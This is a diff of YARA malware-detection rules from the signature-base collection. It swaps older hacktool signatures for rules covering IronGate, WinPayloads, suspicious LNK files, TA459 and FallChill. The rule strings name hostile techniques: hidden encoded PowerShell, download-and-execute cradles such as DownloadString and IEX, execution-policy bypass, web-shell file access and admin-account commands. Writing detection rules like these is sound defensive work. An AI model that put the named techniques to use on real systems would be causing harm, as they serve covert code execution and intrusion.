-		hash = "bbea5a94950b0e8aab4a12ad80e09b630dd98115"
-		logic_hash = "ad0e8f964c7be376236b50ea370de3e433fa9e7b043663d8f32fad06997056ea"
-		score = 60
+		logic_hash = "aab41ada32a8186f958baccad08b60ac1ab686f7561d4dd4471a1e88ddd53730"
+		score = 90
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0539af1a0cc7f231af8f135920a990321529479f6534c3b64e571d490e1514c3"
+		hash2 = "fa8400422f3161206814590768fc1a27cf6420fc5d322d52e82899ac9f49e14f"
+		hash3 = "5ab1672b15de9bda84298e0bb226265af09b70a9f0b26d6dfb7bdd6cbaed192d"
 
 	strings:
-		$s0 = "Executes Command Remotely" fullword wide
-		$s2 = "XYZCmd.exe" fullword wide
-		$s6 = "No Client Software" fullword wide
-		$s19 = "XYZCmd V1.0 For NT S" fullword ascii
+		$x1 = "\\obj\\Release\\Step7ProSim.pdb" ascii
+		$s1 = "Step7ProSim.Interfaces" fullword ascii
+		$s2 = "payloadExecutionTimeInMilliSeconds" fullword ascii
+		$s3 = "PackagingModule.Step7ProSim.dll" fullword wide
+		$s4 = "<KillProcess>b__0" fullword ascii
+		$s5 = "newDllFilename" fullword ascii
+		$s6 = "PackagingModule.exe" fullword wide
+		$s7 = "$863d8af0-cee6-4676-96ad-13e8540f4d47" fullword ascii
+		$s8 = "RunPlcSim" fullword ascii
+		$s9 = "$ccc64bc5-ef95-4217-adc4-5bf0d448c272" fullword ascii
+		$s10 = "InstallProxy" fullword ascii
+		$s11 = "DllProxyInstaller" fullword ascii
+		$s12 = "FindFileInDrive" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and ( $x1 or 3 of ( $s* ) ) ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_Aspack_Chinese
+rule SIGNATURE_BASE_Irongate_Pyinstaller_Update_EXE : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file ASPack Chinese.ini"
+		description = "Detects a PyInstaller file named update.exe as mentioned in the IronGate APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ac821117-7534-5dec-9477-25be87361900"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1769-L1786"
+		id = "f8d1b97e-86d9-547f-a212-a84fb068af3c"
+		date = "2016-06-04"
+		modified = "2023-01-06"
+		reference = "https://goo.gl/Mr6M2J"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irongate.yar#L42-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "02a9394bc2ec385876c4b4f61d72471ac8251a8e"
-		logic_hash = "98b3af76986cd41190612a2fdfbd9ba48f102456897f4acaedd89a40ab5a582a"
+		logic_hash = "b55e02af900b3510743502bd72d5e14c9235985b5a7b05def0f5c462b28f2216"
 		score = 60
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "2044712ceb99972d025716f0f16aa039550e22a63000d2885f7b7cd50f6834e0"
 
 	strings:
-		$s0 = "= Click here if you want to get your registered copy of ASPack" fullword ascii
-		$s1 = ";  For beginning of translate - copy english.ini into the yourlanguage.ini" fullword ascii
-		$s2 = "E-Mail:                      shinlan@km169.net" fullword ascii
-		$s8 = ";  Please, translate text only after simbol '='" fullword ascii
-		$s19 = "= Compress with ASPack" fullword ascii
+		$s1 = "bpython27.dll" fullword ascii
+		$s5 = "%s%s.exe" fullword ascii
+		$s6 = "bupdate.exe.manifest" fullword ascii
+		$s9 = "bunicodedata.pyd" fullword ascii
+		$s11 = "distutils.sysconfig(" ascii
+		$s16 = "distutils.debug(" ascii
+		$s18 = "supdate" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Aspbackdoor_EDIR
+rule SIGNATURE_BASE_Nirsoft_Netresview : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file EDIR.ASP"
+		description = "Detects NirSoft NetResView - utility that displays the list of all network resources"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0895091a-b620-5746-8245-d44716ec2bbe"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1788-L1805"
+		id = "bf786432-3ecf-510e-8d95-50aff09826ce"
+		date = "2016-06-04"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/Mr6M2J"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irongate.yar#L67-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "03367ad891b1580cfc864e8a03850368cbf3e0bb"
-		logic_hash = "be7d956333107a57a0fd86c69fc9eabcd3d9daf3f66385c44ba246fc2000dc4d"
-		score = 60
+		logic_hash = "56c3c7a98bcefa609ee604ea0d7d3f4dd237d91a9439eeed66e0d6f3a20dfdd0"
+		score = 40
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "83f0352c14fa62ae159ab532d85a2b481900fed50d32cc757aa3f4ccf6a13bee"
 
 	strings:
-		$s1 = "response.write \"<a href='index.asp'>" fullword ascii
-		$s3 = "if Request.Cookies(\"password\")=\"" ascii
-		$s6 = "whichdir=server.mappath(Request(\"path\"))" fullword ascii
-		$s7 = "Set fs = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
-		$s19 = "whichdir=Request(\"path\")" fullword ascii
+		$s1 = "NetResView.exe" fullword wide
+		$s2 = "2005 - 2013 Nir Sofer" wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Bypassfirewall_Zip_Folder_Ie
+rule SIGNATURE_BASE_Winpayloads_Powershell : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file Ie.dll"
+		description = "Detects WinPayloads PowerShell Payload"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7bd10fa1-be2d-5882-b4c7-b696612343e5"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1807-L1823"
+		id = "8b6b8823-4656-5b0d-9a1e-84045287f5bf"
+		date = "2017-07-11"
+		modified = "2023-12-05"
+		reference = "https://github.com/nccgroup/Winpayloads"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_winpayloads.yar#L12-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d1b9058f16399e182c9b78314ad18b975d882131"
-		logic_hash = "844e260870f075b0afae0667691e61ab8f138a29871f9a18d1f2b623f9bb9e2a"
-		score = 60
+		logic_hash = "e9e75f7190327f08c5e204977c6714c93951a6db0ddf000c8b37db37131b9def"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "011eba8f18b66634f6eb47527b4ceddac2ae615d6861f89a35dbb9fc591cae8e"
 
 	strings:
-		$s0 = "d:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dll" fullword ascii
-		$s1 = "LOADER ERROR" fullword ascii
-		$s5 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
-		$s7 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
+		$x1 = "$Base64Cert = 'MIIJeQIBAzCCCT8GCSqGSIb3DQEHAaCCCTAEggksMIIJKDCCA98GCSqGSIb3DQEHBqCCA9AwggPMAgEAMIIDxQYJKoZIhvcNAQcBMBwGCiqGSIb3D" ascii
+		$x2 = "powershell -w hidden -noni -enc SQBF" fullword ascii nocase
+		$x3 = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwA" ascii
+		$x4 = "powershell.exe -WindowStyle Hidden -enc JABjAGwAaQBlAG4AdAA" ascii
 
 	condition:
-		all of them
+		filesize < 10KB and 1 of them
 }
-rule SIGNATURE_BASE_Editkeylogreadme
+rule SIGNATURE_BASE_Winpayloads_Payload : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file EditKeyLogReadMe.txt"
+		description = "Detects WinPayloads Payload"
 		author = "Florian Roth (Nextron Systems)"
-		id = "db083c04-9e5c-5cfd-b4d4-eecf28191b6b"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1825-L1843"
+		id = "44fae324-1fc8-5417-950a-8a3783b6d2ae"
+		date = "2017-07-11"
+		modified = "2023-12-05"
+		reference = "https://github.com/nccgroup/Winpayloads"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_winpayloads.yar#L30-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "dfa90540b0e58346f4b6ea12e30c1404e15fbe5a"
-		logic_hash = "a58a2336e7d714a2e7f60eec8dacbee9a7190552dd791d8b6eba084ffaf0904a"
-		score = 60
-		quality = 35
-		tags = ""
+		logic_hash = "8a22eeafa320bcf0d41de402223d3ad51d8625ffaa68fe24be864ffcf72a64a2"
+		score = 75
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "23a24f99c3c6c00cd4bf6cb968f813ba2ceadfa846c7f169f412bcbb71ba6573"
+		hash2 = "35069905d9b7ba1fd57c8df03614f563504194e4684f47aafa08ebb8d9409d0b"
+		hash3 = "a28d107f168d85c38fc76229b14561b472e60e60973eb10b6b554c1f57469322"
+		hash4 = "ed93e28ca18f749a78678b1e8e8ac31f4c6c0bab2376d398b413dbdfd5af9c7f"
+		hash5 = "26f5aee1ce65158e8375deb63c27edabfc9f5de3c1c88a4ce26a7e50b315b6d8"
+		hash6 = "b25a515706085dbde0b98deaf647ef9a8700604652c60c6b706a2ff83fdcbf45"
 
 	strings:
-		$s0 = "editKeyLog.exe KeyLog.exe," fullword ascii
-		$s1 = "WinEggDrop.DLL" fullword ascii
-		$s2 = "nc.exe" fullword ascii
-		$s3 = "KeyLog.exe" fullword ascii
-		$s4 = "EditKeyLog.exe" fullword ascii
-		$s5 = "wineggdrop" fullword ascii
+		$s1 = "bpayload.exe.manifest" fullword ascii
+		$s2 = "spayload" fullword ascii
 
 	condition:
-		3 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 10000KB and all of them )
 }
-rule SIGNATURE_BASE_Passsniffer_Zip_Folder_Readme
+rule SIGNATURE_BASE_SUSP_LNK_Lnkfileoverrfc : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file readme.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f5965aa8-0f78-56fd-8e3e-6dc013942cb3"
-		date = "2014-11-23"
-		modified = "2025-04-14"
+		description = "Detects APT lnk files that run double extraction and launch routines with autoruns"
+		author = "@Grotezinfosec, modified by Florian Roth"
+		id = "19c393af-ff7c-5345-a3ef-c06372344baf"
+		date = "2018-09-18"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1845-L1860"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_lnk_files.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a52545ae62ddb0ea52905cbb61d895a51bfe9bcd"
-		logic_hash = "d9e6cd2ba7e98481664b0560184a07349bb471dd370c4b73ef5f5f05a8e89946"
-		score = 60
+		logic_hash = "52ff949a17039c1fa5707ff503aa1a96b3925bdfef01867c9b59a8d72493a84e"
+		score = 65
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "PassSniffer.exe" fullword ascii
-		$s1 = "POP3/FTP Sniffer" fullword ascii
-		$s2 = "Password Sniffer V1.0" fullword ascii
+		$command = "C:\\Windows\\System32\\cmd.exe" fullword ascii
+		$command2 = {2F 00 63 00 20 00 66 00 69 00 6E 00 64 00 73 00 74 00 72}
+		$base64 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD" ascii
+		$cert = " -decode " ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and filesize > 15KB and ( 2 of them )
 }
-rule SIGNATURE_BASE_Sig_238_Gina
+rule SIGNATURE_BASE_SUSP_LNK_Suspiciouscommands : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file gina.reg"
+		description = "Detects LNK file with suspicious content"
 		author = "Florian Roth (Nextron Systems)"
-		id = "85c19493-e6d4-55e8-8526-6817243e90cf"
-		date = "2014-11-23"
-		modified = "2025-04-14"
+		id = "8bfb1322-8e33-50bc-a389-2d8bdfec9ca7"
+		date = "2018-09-18"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1862-L1877"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_lnk_files.yar#L20-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "324acc52566baf4afdb0f3e4aaf76e42899e0cf6"
-		logic_hash = "f0ece7406a31f5a4212da5c4144233c5c45b8120d09267fdf7e291d6c9827384"
+		logic_hash = "a0380927ebc89e46f9138e01f154113c5e23680cea9b117b47406003ea565c1e"
 		score = 60
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 81
+		tags = "FILE"
 
 	strings:
-		$s0 = "\"gina\"=\"gina.dll\"" fullword ascii
-		$s1 = "REGEDIT4" fullword ascii
-		$s2 = "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]" fullword ascii
+		$s1 = " -decode " ascii wide
+		$s2 = " -enc " ascii wide
+		$s3 = " -w hidden " ascii wide
+		$s4 = " -ep bypass " ascii wide
+		$s5 = " -noni " ascii nocase wide
+		$s7 = " -noprofile " ascii wide
+		$s8 = ".DownloadString(" ascii wide
+		$s9 = ".DownloadFile(" ascii wide
+		$s10 = "IEX(" ascii wide
+		$s11 = "iex(" ascii wide
+		$s12 = "WScript.shell" ascii wide fullword nocase
+		$s13 = " -nop " ascii wide
+		$s14 = "&tasklist>"
+		$s15 = "setlocal EnableExtensions DisableDelayedExpansion"
+		$s16 = "echo^ set^"
+		$s17 = "del /f /q "
+		$s18 = " echo | start "
+		$s19 = "&& echo "
+		$s20 = "&&set "
+		$s21 = "%&&@echo off "
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x004c and 1 of them
 }
-rule SIGNATURE_BASE_Splitjoin
+rule SIGNATURE_BASE_SUSP_DOC_LNK_In_ZIP : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2f1a69cd-34b3-5af0-a054-fe19d9becb25"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1879-L1895"
+		description = "Detects suspicious .doc.lnk file in ZIP archive"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9c140d02-3b18-5faf-bb1d-2eb5c07a23dc"
+		date = "2019-07-02"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/RedDrip7/status/1145877272945025029"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_lnk_files.yar#L53-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e4a9ef5d417038c4c76b72b5a636769a98bd2f8c"
-		logic_hash = "dede4518ed9be28e89bc67dab4e68503383c16746f088f37a4c8069e256183ca"
-		score = 60
+		logic_hash = "ef4cdaad05af12f210aa6324a1e34a42843f814c59fb0085ac18370917ad4866"
+		score = 50
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "7ea4f77cac557044e72a8e280372a2abe072f2ad98b5a4fbed4e2229e780173a"
 
 	strings:
-		$s0 = "Not for distribution without the authors permission" fullword wide
-		$s2 = "Utility to split and rejoin files.0" fullword wide
-		$s5 = "Copyright (c) Angus Johnson 2001-2002" fullword wide
-		$s19 = "SplitJoin" fullword wide
+		$s1 = ".doc.lnk" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x4b50 and 1 of them
 }
-rule SIGNATURE_BASE_Editkeylog
+rule SIGNATURE_BASE_TA459_Malware_May17_1 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file EditKeyLog.exe"
+		description = "Detects TA459 related malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "db083c04-9e5c-5cfd-b4d4-eecf28191b6b"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1897-L1913"
+		id = "eb5d2464-ab95-5f5d-8b20-fa023da53130"
+		date = "2017-05-31"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/RLf9qU"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta459.yar#L12-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a450c31f13c23426b24624f53873e4fc3777dc6b"
-		logic_hash = "0efb173598117857c5bf7894f017d655653e843dd0a44439d1b10b7e5c59b248"
-		score = 60
+		logic_hash = "2655d4c3a28ad2f77bbf50cd3dface7de49f675f0f974aa44d9b69c3f803da30"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5fd61793d498a395861fa263e4438183a3c4e6f1e4f098ac6e97c9d0911327bf"
 
 	strings:
-		$s1 = "Press Any Ke" fullword ascii
-		$s2 = "Enter 1 O" fullword ascii
-		$s3 = "Bon >0 & <65535L" fullword ascii
-		$s4 = "--Choose " fullword ascii
+		$s3 = "xtsewy" fullword ascii
+		$s6 = "CW&mhAklnfVULL" ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x6152 and filesize < 800KB and all of them )
 }
-rule SIGNATURE_BASE_Passsniffer
+rule SIGNATURE_BASE_TA459_Malware_May17_2 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file PassSniffer.exe"
+		description = "Detects TA459 related malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f5965aa8-0f78-56fd-8e3e-6dc013942cb3"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1915-L1933"
+		id = "62954422-4657-5ded-9883-bb78eac697fb"
+		date = "2017-05-31"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/RLf9qU"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta459.yar#L28-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "dcce4c577728e8edf7ed38ac6ef6a1e68afb2c9f"
-		logic_hash = "771b45473c48618c43c6be84dd37b2ccb23643f1674d437763cb78ce560067c0"
-		score = 60
+		logic_hash = "9904f3905672e5209df037dff1fa2e4d88ee33531096045eb9b9f7460458b6a2"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4601133e94c4bc74916a9d96a5bc27cc3125cdc0be7225b2c7d4047f8506b3aa"
 
 	strings:
-		$s2 = "Sniff" fullword ascii
-		$s3 = "GetLas" fullword ascii
-		$s4 = "VersionExA" fullword ascii
-		$s10 = " Only RuntUZ" fullword ascii
-		$s12 = "emcpysetprintf\\" ascii
-		$s13 = "WSFtartup" fullword ascii
+		$a1 = "Mcutil.dll" fullword ascii
+		$a2 = "mcut.exe" fullword ascii
+		$s1 = "Software\\WinRAR SFX" fullword ascii
+		$s2 = "AYou may need to run this self-extracting archive as administrator" fullword wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and all of ( $a* ) and 1 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Aspfile2
+rule SIGNATURE_BASE_TA17_318A_Rc4_Stack_Key_Fallchill : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file aspfile2.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "42bbcc16-a6d7-53d7-8651-1a28c6b26ee8"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1935-L1951"
+		description = "HiddenCobra FallChill - rc4_stack_key"
+		author = "US CERT"
+		id = "0a2afcab-f540-592f-aa75-64c0a13d26f3"
+		date = "2017-11-15"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318B"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta17_318A.yar#L10-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "14efbc6cb01b809ad75a535d32b9da4df517ff29"
-		logic_hash = "0fd52e646751b14840f30100382c5171fd001c05110dccb4ac87be9b2c4b6131"
-		score = 60
+		logic_hash = "f284cb492ff5242d7bf577580fd95723ef7d3f109c7217a26bbefbbff7150255"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "response.write \"command completed success!\" " fullword ascii
-		$s1 = "for each co in foditems " fullword ascii
-		$s3 = "<input type=text name=text6 value=\"<%= szCMD6 %>\"><br> " fullword ascii
-		$s19 = "<title>Hello! Welcome </title>" fullword ascii
+		$stack_key = { 0d 06 09 2a ?? ?? ?? ?? 86 48 86 f7 ?? ?? ?? ?? 0d 01 01 01 ?? ?? ?? ?? 05 00 03 82 41 8b c9 41 8b d1 49 8b 40 08 48 ff c2 88 4c 02 ff ff c1 81 f9 00 01 00 00 7c eb }
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and $stack_key
 }
-rule SIGNATURE_BASE_Unpack_Rar_Folder_Injectt
+rule SIGNATURE_BASE_TA17_318A_Success_Fail_Codes_Fallchill : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cc7d1a36-1214-5a14-8589-9eb2339a8700"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1953-L1976"
+		description = "HiddenCobra FallChill - success_fail_codes"
+		author = "US CERT"
+		id = "f2390b03-238e-5ae6-af85-e5dd5790362f"
+		date = "2017-11-15"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318B"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta17_318A.yar#L23-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "80f39e77d4a34ecc6621ae0f4d5be7563ab27ea6"
-		logic_hash = "f9d682a9438f49cf8292c33e680537d8c2137b8cba2670430b92d0a620de85b9"
-		score = 60
+		logic_hash = "73f6b36554d83f7708e9468602e529c4865269d362ebeebf6b355ccf7c2a8686"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "%s -Install                          -->To Install The Service" fullword ascii
-		$s1 = "Explorer.exe" fullword ascii
-		$s2 = "%s -Start                            -->To Start The Service" fullword ascii
-		$s3 = "%s -Stop                             -->To Stop The Service" fullword ascii
-		$s4 = "The Port Is Out Of Range" fullword ascii
-		$s7 = "Fail To Set The Port" fullword ascii
-		$s11 = "\\psapi.dll" ascii
-		$s20 = "TInject.Dll" fullword ascii
-		$x1 = "Software\\Microsoft\\Internet Explorer\\WinEggDropShell" fullword ascii
-		$x2 = "injectt.exe" fullword ascii
+		$s0 = { 68 7a 34 12 00 }
+		$s1 = { ba 7a 34 12 00 }
+		$f0 = { 68 5c 34 12 00 }
+		$f1 = { ba 5c 34 12 00 }
 
 	condition:
-		(1 of ( $x* ) ) and ( 3 of ( $s* ) )
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and ( ( $s0 and $f0 ) or ( $s1 and $f1 ) )
 }
-rule SIGNATURE_BASE_Jc_Wineggdrop_Shell
+
+rule SIGNATURE_BASE_Hiddencobra_Fallchill_1 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file Jc.WinEggDrop Shell.txt"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "219df3a1-fe1c-5d33-ab3e-1b3cbd104c9e"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1978-L1997"
+		id = "5bbeb5ba-93d7-5903-9132-749afe5776ae"
+		date = "2017-11-15"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta17_318A.yar#L51-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "820674b59f32f2cf72df50ba4411d7132d863ad2"
-		logic_hash = "af43980b4052cef56884e9d6bdbb12919f1a86420a3f189e30fba624ab37a420"
-		score = 60
+		logic_hash = "8e6215a81272ea457318dd83eff9e1902c5e1d1a124ff674b145f2dc5e4a3711"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a606716355035d4a1ea0b15f3bee30aad41a2c32df28c2d468eafd18361d60d6"
 
 	strings:
-		$s0 = "Sniffer.dll" fullword ascii
-		$s4 = ":Execute net.exe user Administrator pass" fullword ascii
-		$s5 = "Fport.exe or mport.exe " fullword ascii
-		$s6 = ":Password Sniffering Is Running |Not Running " fullword ascii
-		$s9 = ": The Terminal Service Port Has Been Set To NewPort" fullword ascii
-		$s15 = ": Del www.exe                   " fullword ascii
-		$s20 = ":Dir *.exe                    " fullword ascii
+		$s1 = "REGSVR32.EXE.MUI" fullword wide
+		$s2 = "Microsoft Corporation. All rights reserved." fullword wide
+		$s3 = "c%sd.e%sc %s > \"%s\" 2>&1" fullword wide
+		$s4 = "\" goto Loop" fullword ascii
+		$e1 = "xolhvhlxpvg" fullword ascii
+		$e2 = "tvgslhgybmanv" fullword ascii
+		$e3 = "CivagvTllosvok32Smakhslg" fullword ascii
